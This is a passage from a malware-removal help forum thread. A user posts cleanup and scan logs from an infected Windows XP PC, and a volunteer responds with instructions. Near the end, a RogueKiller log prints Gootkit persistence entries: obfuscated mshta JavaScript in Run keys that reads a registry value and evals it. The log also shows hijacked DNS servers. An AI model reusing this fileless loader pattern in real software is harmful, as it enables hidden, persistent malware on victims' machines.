Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by Daniel on Wed 06/24/2015 at  9:25:45.95.
Microsoft Windows XP Professional 5.1.2600 Service Pack 3 x86
Running in: Normal Mode Internet Access Detected
Launched: H:\Documents and Settings\Daniel\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

6/24/2015 9:40:00 AM Zoek.exe System Restore Point Created Successfully.

==== Possible Rootkit Infection ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Desktop\Install

==== Empty Folders Check ======================

H:\Program Files\Malwarebytes' Anti-Malware deleted successfully
H:\Program Files\NirSoft deleted successfully
H:\Program Files\Xenocode deleted successfully
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes' Anti-Malware (portable) deleted successfully
H:\DOCUME~1\ALLUSE~1\APPLIC~1\xml_param deleted successfully
H:\Documents and Settings\Daniel\Application Data\AdobeUM deleted successfully
H:\Documents and Settings\Daniel\Application Data\Malwarebytes deleted successfully
H:\Documents and Settings\Daniel\Application Data\Vso deleted successfully
H:\Documents and Settings\LocalService\Application Data\Apple Computer deleted successfully
H:\Documents and Settings\NetworkService\Application Data\Apple Computer deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\WMTools Downloaded Files deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0A900DF-9611-4446-86BD-4B1D47E7DB2A} deleted successfully
HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F4E39681-15F8-4fda-B8A3-B5C98378F2F3} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Deleting Services ======================

==== Batch Command(s) Run By Tool======================

==== Deleting Files \ Folders ======================

H:\Program Files\NirSoft not found
H:\Program Files\Xenocode not found
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes' Anti-Malware (portable) not found
H:\Program Files\ComPlus Applications deleted
H:\Program Files\WindowsUpdate deleted
H:\Documents and Settings\Daniel\.android deleted
H:\Documents and Settings\Daniel\Application Data\pcouffin.log deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\lpm.dat deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\LaunchURL.bat deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Package Cache deleted
H:\WINDOWS\system32\GroupPolicy\ADM deleted
"H:\Documents and Settings\Daniel\Application Data\????" not deleted
"H:\Documents and Settings\Daniel\Application Data\Android\7z.dll" deleted
"H:\Documents and Settings\Daniel\Application Data\Android\7z.exe" deleted
"H:\Documents and Settings\Daniel\Application Data\Android\aapt.exe" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Converter\UnpinShortcuts.vbs" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\Media Library" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\player.blob" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\UnpinShortcuts.vbs" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\TransferWizard\Devices" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1\Font Cache" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1\Hardware Cache" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\device_description.xbox360.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\device_description.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\service_description.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\avtransport.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\connectionmanager.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\contentdirectory.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\index.html" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\logo.jpg" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\logo.png" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\mediareceiverregistrar.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\renderingcontrol.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security\ekrnSmonEL.dat" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security\ekrnSmonWL.dat" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET" deleted
"H:\Documents and Settings\Daniel\Application Data\Help" deleted
"H:\Documents and Settings\Daniel\Application Data\Android" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Converter" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Codec" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\TransferWizard" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\thumbnails" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security" deleted
"H:\DOCUME~1\ALLUSE~1\APPLIC~1\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}" not deleted

==== Firefox Start and Search pages ======================

ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
user_pref("browser.startup.homepage", "http://www.cnn.com/");

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions]
"{20a82645-c095-46ed-80e3-08825760534b}"="h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension" [08/19/2010 07:49 PM]

==== Firefox Extensions ======================

ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
- Flagfox - %ProfilePath%\extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}
- Microsoft .NET Framework Assistant - %ProfilePath%\extensions\{20a82645-c095-46ed-80e3-08825760534b}

AppDir: H:\Program Files\Mozilla Firefox
- Default - %AppDir%\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
6BEAD7859E8A087BE04556AB5A78855C - H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npo1d.dll - Google Talk Plugin Video Renderer
49D429EBF5305FC9ADD7545B7C914333 - H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npgoogletalk.dll - Google Talk Plugin
D0E0E175428BA9443D2F144A163DEF5A - H:\Program Files\DivX\DivX Web Player\npdivx32.dll - DivX Plus Web Player
46A59E6F7F7C1679AC7C4655E055326D - H:\Program Files\iTunes\Mozilla Plugins\npitunes.dll - iTunes Application Detector
559E8D42BE485208F1C4BB294D6840A4 - H:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll - QuickTime Plug-in 7.7.6
5D4279248A0E506CF007BD51EBF74CEA - H:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll - QuickTime Plug-in 7.7.6
F9DE379CE8A782530A4FA0B731F3A49B - H:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll - QuickTime Plug-in 7.7.6
049BD7AD3B94F24FA274ED1F7FC5871B - H:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll - QuickTime Plug-in 7.7.6
D937A4645EFF8CB4F123E3C899C052B2 - H:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll - QuickTime Plug-in 7.7.6
14D06C3796CE3F6BA8F43CDF3AD65D76 - H:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java™ Platform SE 7 U67
0A6E5E3BEF374AA2F47071E7374EAD7B - H:\Program Files\Java\jre7\bin\dtplugin\npdeployJava1.dll - Java Deployment Toolkit 7.0.670.1
79039398587F475ADA606D1A3B740A63 - H:\Program Files\DivX\DivX OVS Helper\npovshelper.dll - DivX VOD Helper Plug-in
95812430959AE88CDD0301AB3A71913B - H:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll - Shockwave Flash
E3B4EA121F7BDEB0F6366E2BA9608CB5 - H:\Documents and Settings\Daniel\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll - Citrix Online Web Deployment Plugin 1.0.0.104
BE501CBC29B2025A263D80D399F1797A - H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll - Silverlight Plug-In
E0AD06BE7DBEC6EF843711E97080549A - H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll - Adobe Acrobat
AB87EEFFD18F2BAAFC274E7075EA6C67 - H:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll - Windows Presentation Foundation / Windows Presentation Foundation
28000D7EEB2FD95A36E1A7539F599C3B - H:\Program Files\Windows Media Player\npdrmv2.dll - Microsoft® DRM
8B6884E3E1E5F8ABA5FA0C6A2B13181D - H:\Program Files\Windows Media Player\npwmsdrm.dll - Microsoft® DRM
5D41BCD19A3D90E4EBB58A6BFB79E4F7 - H:\Program Files\Windows Media Player\npdsplay.dll - Windows Media Player Plug-in Dynamic Link Library
559E8D42BE485208F1C4BB294D6840A4 - H:\Program Files\QuickTime\Plugins\npqtplugin5.dll - QuickTime Plug-in 7.7.6
5D4279248A0E506CF007BD51EBF74CEA - H:\Program Files\QuickTime\Plugins\npqtplugin4.dll - QuickTime Plug-in 7.7.6
F9DE379CE8A782530A4FA0B731F3A49B - H:\Program Files\QuickTime\Plugins\npqtplugin3.dll - QuickTime Plug-in 7.7.6
049BD7AD3B94F24FA274ED1F7FC5871B - H:\Program Files\QuickTime\Plugins\npqtplugin2.dll - QuickTime Plug-in 7.7.6
D937A4645EFF8CB4F123E3C899C052B2 - H:\Program Files\QuickTime\Plugins\npqtplugin.dll - QuickTime Plug-in 7.7.6
B27CCB1168B1960AEC6E9D3E0E0F0D2A - H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrlui.dll - Microsoft® Silverlight

==== Chromium Look ======================

Tidy Sidebar - Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dgmacifhhpefamjmolpipkijcofcmbgp
Chrome Hotword Shared Module - Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg

==== Chromium Startpages ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences
FCC8C5A62EFAB68D232B5F5D1E680B5558731849456BB0"}},"homepage":"9C5CEE992DD514CC1DA27D3B8518574EE348EC61C6F3ADEFF41FE29BB9587427","homepage_is_newtabpage":"596CFF901B5BE41138F6E5F48B744E581DF4DC7B8F4ED225D3F4582A8114F792","pinned_tabs":"35427C19C663B7B485AFBEB3F809439FA156E2C49143E7BF954786AF44EA8F64","prefs":{"preference_reset_time":"501632AA5093C86CCE751D57C2FE04FA778F9F375351141B01957E1F0A60B056"},"profile":{"reset_prompt_memento":"C55E3759B9F0A9232E22EF1A8A4879DB18AEAFCDDFDA4B4A150031C9CC2153E7"},"safebrowsing":{"incidents_sent":"4342C3CA39B2C3B81BA66BC612E5AC21840D13AA12DA81DA73B713739F73D07A"},"search_provider_overrides":"4708C65C58EEE4482158BE7852A0BADE0255AF0152CB10BF9291D281F4FACAC2","session":{"restore_on_startup":"6B6DD132B0D4A1FC4BE8AF6BC715A857094E3EB035C81776BF9A4CA3939C5BE4","startup_urls":"2CB655690C07B151EC5239353809FE17D00ABED0D6AECC045E89BD57B262F79E"},"software_reporter":{"prompt_reason":"46303140CE21D11071D778BB11DB28FC53E34EFAB11896037CA9B263DA99F40F","prompt_seed":"508824F68082373E47B3B6DB2849A63D92F1D33CB96D755D116A8797225E2F72","prompt_version":"46EA9628F6D25B049A9B09CB5A0EAC8234D531A719DB6D67B2F72204F4534895"},"sync":{"remaining_rollback_tries":"368E6EF0385FDEB35AFBED0DD95A6D57F87348C85F22B63810231DEF9B8EE797"}},"super_mac":"5347599CB078C138374700276539C273B637727F0CBAF6B78BEC3141C9DA799A"},"session":{"restore_on_startup":4,"startup_urls":["http://www.msn.com/","http://www.cnn.com/"]},"sync":{"remaining_rollback_tries":0}}

==== Chromium Fix ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_lyrics.wikia.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_lyrics.wikia.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.allthelyrics.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.allthelyrics.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.lyricsfreak.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.lyricsfreak.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.metrolyrics.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.metrolyrics.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_shop.boldshopping.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_shop.boldshopping.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_unlimitedshoppingchoice.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_unlimitedshoppingchoice.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_static.olark.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_static.olark.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_services2.capitalone.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_services2.capitalone.com_0.localstorage-journal deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.cnn.com/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.cnn.com/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{C02C90FA-7AC3-41C0-8908-8A8F444FD4DE}"
{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} @ieframe.dll,-12512  Url="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC"
{C02C90FA-7AC3-41C0-8908-8A8F444FD4DE} Google  Url="http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{CAAB0192-5704-469F-A0BE-2D842D70E93B}_is1 deleted successfully

==== Empty IE Cache ======================

H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\01GP4IA2 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\1HK8FZDD will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\2RJKB18Q will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\6IBS2IM1 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\8QMU1OFJ will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\FSLZOMR5 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\LM82SWYN will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\XARNOC8S will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
H:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

==== Empty FireFox Cache ======================

No FireFox Cache found

==== Empty Chrome Cache ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== H:\zoek_backup content ======================

H:\zoek_backup (files=58 folders=27 57970795 bytes)

==== Empty Temp Folders ======================

H:\Documents and Settings\Daniel\Local Settings\Temp will be emptied at reboot
H:\Documents and Settings\Default User\Local Settings\temp emptied successfully
H:\Documents and Settings\LocalService\Local Settings\temp emptied successfully
H:\Documents and Settings\LogMeInRemoteUser\Local Settings\temp emptied successfully
H:\Documents and Settings\NetworkService\Local Settings\temp emptied successfully
H:\WINDOWS\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

H:\WINDOWS\Temp successfully emptied
H:\DOCUME~1\Daniel\LOCALS~1\Temp successfully emptied

==== Empty Recycle Bin ======================

H:\RECYCLER successfully emptied

==== Deleting Files / Folders ======================

"H:\Documents and Settings\Daniel\Application Data\????"  not deleted
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\index.dat" not found
"H:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat" not deleted
"H:\DOCUME~1\ALLUSE~1\APPLIC~1\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}"  not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\01GP4IA2" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\1HK8FZDD" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\2RJKB18Q" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\6IBS2IM1" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\8QMU1OFJ" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\FSLZOMR5" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\LM82SWYN" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\XARNOC8S" not found

==== EOF on Wed 06/24/2015 at 16:54:01.48 ======================

 

Computer "seems" good now (5:15pm EDT).

 

I will report back in a few hours.



#6 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 25 June 2015 - 06:43 AM

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#7 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 25 June 2015 - 04:38 PM

Back at square one.

 

I can barely open a folder. I tried to open an Excel file and after 5 minutes of the hard drive spinning I gave up.

 

Eset continuously pops up and says it found a Win32/Bedep.D Trojan and I need to reboot to finish the cleaning process.

 

Upon reboot (to potenially finish Eset's cleaning process) "notepad.exe failed", "msdtc.exe failed" and "msiexec.exe failed" messages appear.

 

At reboot the same Eset message appears.....I could reboot 20 times and the same message appears and the same exe error messages appear.

 

Ipconfig from a cmd window still shows an odd ip. All other computers in the house show a 123.123.12.1 type of ip.

 

The infected computer shows a 12.12.123.123 type of ip.

 

I have done very little with the computer since doing the zoek yesterday. I do leave the computer on all the time.

 

I have two "my Book" type external hard drives attached to the computer that are set to do redundant backups once a week.

 

Could something "hide" on one of them ? I'm grasping at straws at this point...

 

Thanks for your help.



#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 26 June 2015 - 07:56 AM

Ipconfig from a cmd window still shows an odd ip. All other computers in the house show a 123.123.12.1 type of ip.

The infected computer shows a 12.12.123.123 type of ip.



http://whatismyipaddress.com/ip/12.12.123.123

From:
AT&T Services
State/Region: Alaska
City: Anchorage
===

http://whatismyipaddress.com/ip/123.123.12.1

From:
ISP: China Unicom Beijing
State/Region: Beijing Shi
City: Beijing



Are both required?

===

Lets check these files.

Please run the Farbar Recovery Scan Tool. Enter notepad.exe;msdtc.exe;msiexec.exe in the Search Box and hit the File Search button.
Post the content of the Search.txt in your next reply

#9 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 26 June 2015 - 01:08 PM

I apologize.

 

Rather than posting the exact IP I was more trying to illustrate that all other computers in the house show IP's that are (three numbers.three numbers.two numbers.one number) the "infected" computers IP is (two numbers.two numbers.three numbers.three numbers)

 

I will run the Farbar scan and report back.

 

Thanks.



#10 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 26 June 2015 - 01:17 PM

Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-26 14:14:28
Running from H:\Documents and Settings\Daniel\Desktop
Boot Mode: Normal
 
================== Search Files: "notepad.exe;msdtc.exe;msiexec.exe" =============
 
H:\WINDOWS\notepad.exe
[2010-08-18 06:42][2008-04-13 20:12] 0069120 ____A (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
H:\WINDOWS\system32\msdtc.exe
[2010-08-18 10:59][2008-04-13 20:12] 0006144 ____A (Microsoft Corporation) a137f1470499a205abbb9aafb3b6f2b1      [File is signed]
 
H:\WINDOWS\system32\msiexec.exe
[2004-08-04 00:56][2008-04-13 20:12] 0078848 ____A (Microsoft Corporation) 5879d691e842574a20fe63817cb76df9      [File is signed]
 
H:\WINDOWS\system32\notepad.exe
[2004-08-04 00:56][2008-04-13 20:12] 0069120 ____A (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\msdtc.exe
[2008-04-13 20:12][2008-04-13 20:12] 0006144 _____ (Microsoft Corporation) a137f1470499a205abbb9aafb3b6f2b1      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\msiexec.exe
[2008-04-13 20:12][2008-04-13 20:12] 0078848 _____ (Microsoft Corporation) 5879d691e842574a20fe63817cb76df9      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\notepad.exe
[2008-04-13 20:12][2008-04-13 20:12] 0069120 _____ (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
====== End of Search ======


#11 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 27 June 2015 - 07:28 AM

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator to start"
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished ...
  • Then Click on "Scan" button
  • Wait until the Status box shows "Scan Finished"
  • click on "delete"
  • Wait until the Status box shows "Deleting Finished"
  • Click on "Report" and copy/paste the content of the Notepad into your next reply.
  • The log should be found in RKreport[1].txt on your Desktop
  • Exit/Close RogueKiller+
=======

#12 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 27 June 2015 - 12:48 PM

Ran  Rogue Killer and after a reboot the computer is almost 100% non-responsive at this time.

 

After booting into safemode I found 14 Rogue killer logs (took 3 hours for Windows search to find them).

 

I will post the earliest one that I could find.

 

RogueKiller V10.8.6.0 [Jun 22 2015] by Adlice Software
 
Operating System : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Started in : Normal mode
User : Daniel [Administrator]
Started from : H:\Documents and Settings\Daniel\Desktop\RogueKiller.exe
Mode : Scan -- Date : 06/27/2015  09:28:48
 
¤¤¤ Processes : 3 ¤¤¤
[Proc.Injected|Proc.RunPE] svchost.exe(2596) -- H:\WINDOWS\system32\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe(2596) -- H:\WINDOWS\system32\svchost.exe[7] -> Killed [TermProc]
[Suspicious.Path|VT.Unknown] explorer.exe(448) -- H:\Documents and Settings\All Users\Application Data\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}\vfnws.dll[-] -> Unloaded
 
¤¤¤ Registry : 12 ¤¤¤
[Suspicious.Path] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 90bdf87f : "h:\documents and settings\daniel\local settings\application data\dudev\dudev.exe" [x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:ljg1Om3TR="8NnSapX";m59i=new%20ActiveXObject("WScript.Shell");ZEgfqz7v="FMQM";zVK8P=m59i.RegRead("HKLM\\software\\43aefa25\\db9fc761");GoNPix3="0oo0";eval(zVK8P);Rh9aimY="yO"; [x][x] -> Found
[Suspicious.Path] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run | 90bdf87f : "h:\documents and settings\daniel\local settings\application data\dudev\dudev.exe" [x] -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run | fde602ac : mshta javascript:RKRdDgi9e="iW";z56Y=new%20ActiveXObject("WScript.Shell");vUcSm6ZjV="RqQbASQec";N5s8cK=z56Y.RegRead("HKCU\\software\\43aefa25\\db9fc761");bDMC2I3sI="U";eval(N5s8cK);KfS4yc6EAt="W6"; [x][x] -> Found
[Tr.Gootkit] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | 7e95a134 : mshta javascript:LBdNum2="9Dr";D6X2=new%20ActiveXObject("WScript.Shell");lwUW7mak3p="EpXHSolfBO";Dy8Kk9=D6X2.RegRead("HKLM\\software\\43aefa25\\db9fc761");RilNxHma7="qubO";eval(Dy8Kk9);cbu7pCxz="DzuH"; [x][x] -> Found
[PUM.HomePage] HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cnn.com/  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters\Interfaces\{BE1FFF8F-8FF9-4BAC-A554-F861F16D27F7} | DhcpNameServer : 64.233.217.2 64.233.217.3 [X][X]  -> Found
 
